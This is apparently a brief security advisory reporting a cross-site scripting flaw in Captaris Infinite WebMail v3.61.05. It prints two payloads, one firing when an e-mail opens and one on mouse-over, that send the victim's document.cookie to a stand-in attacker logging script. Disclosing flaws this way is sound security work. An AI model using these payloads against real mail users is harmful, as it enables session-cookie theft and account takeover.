|
COMMAND Captaris (Infinite) WebMail XSS SYSTEMS AFFECTED At least WebMail v3.61.05 PROBLEM In pedram [http://pedram.redhive.com] advisory : http://pedram.redhive.com/advisories/dogmail.cgi Captaris (www.captaris.com) Infinite WebMail application is vulnerable to Cross-Site Scripting (XSS) attacks. The application fails to filter the following tags that can both be used to redirect a user to an attack script: Launch on e-mail open: <p style="left:expression(document.location= 'http://attackers.server/cgi-bin/logger.cgi?' +document.cookie)"> Launch on mouse over: <b onMouseOver= "document.location= 'http://attackers.server/cgi-bin/logger.cgi?' +document.cookie\"> I am sure there are other XSS attack methods that can also be utilized to bypass their basic filtering. SOLUTION ?